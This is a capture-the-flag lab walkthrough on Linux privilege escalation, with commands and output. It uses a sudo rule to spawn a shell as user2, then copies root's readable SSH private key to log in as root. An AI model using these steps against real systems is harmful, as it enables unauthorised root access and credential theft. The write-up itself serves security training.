Skip to content

Privilege Escalation

ℹ️ Informations

Question

SSH into the server above with the provided credentials, and use the '-p xxxxxx' to specify the port shown above. Once you login, try to find a way to move to 'user2', to get the flag in '/home/user2/flag.txt'.

SSH to [IP]:30980 with user "user1" and password "password1"

📋 Walkthrough

Login to ssh using provided credentials 

ssh user1@[IP] -p 30980
We get into the server. 
user1@ng-516517-gettingstartedprivesc-nq3l3-599b47bb6f-cjwnh:~$
Try to see if we can run something as root using sudo -l 
user1@ng-516517-gettingstartedprivesc-nq3l3-599b47bb6f-cjwnh:~$ sudo -l
Matching Defaults entries for user1 on ng-516517-gettingstartedprivesc-nq3l3-599b47bb6f-cjwnh:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User user1 may run the following commands on ng-516517-gettingstartedprivesc-nq3l3-599b47bb6f-cjwnh:
    (user2 : user2) NOPASSWD: /bin/bash
Seems we can run /bin/bash as user2, so we can elevate our privileges to that user. 
user1@ng-516517-gettingstartedprivesc-nq3l3-599b47bb6f-cjwnh:~$ sudo -u user2 /bin/bash
user2@ng-516517-gettingstartedprivesc-nq3l3-599b47bb6f-cjwnh:/home/user1$
We can find flag in user2's home.

Answer

HTB{********************************}

Question

Once you gain access to 'user2', try to find a way to escalate your privileges to root, to get the flag in '/root/flag.txt'.

📋 Walkthrough

As user2, check in the filesystem what we can do. If I list directories in /root folder, we can see something interesting.

user2@ng-516517-gettingstartedprivesc-nq3l3-599b47bb6f-cjwnh:/root$ ls -la
total 32
drwxr-x--- 1 root user2 4096 Feb 12  2021 .
drwxr-xr-x 1 root root  4096 Aug 24 11:59 ..
-rwxr-x--- 1 root user2    5 Aug 19  2020 .bash_history
-rwxr-x--- 1 root user2 3106 Dec  5  2019 .bashrc
-rwxr-x--- 1 root user2  161 Dec  5  2019 .profile
drwxr-x--- 1 root user2 4096 Feb 12  2021 .ssh
-rwxr-x--- 1 root user2 1309 Aug 19  2020 .viminfo
-rw------- 1 root root    33 Feb 12  2021 flag.txt
user2@ng-516517-gettingstartedprivesc-nq3l3-599b47bb6f-cjwnh:/root$
We can see the flag.txt file. We also notice that .ssh has users2 as group owner with permission. We can check if we are in that group using id. Entering .ssh folder, we can see that can get the id_rsa key. Copy this key, set 600 permission and try to login with root uwing ssh -i key 
ssh -i key root@[IP] -p 30980
Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 6.1.0-10-amd64 x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

root@ng-516517-gettingstartedprivesc-nq3l3-599b47bb6f-cjwnh:~# cat flag.txt

Answer

HTB{***************************}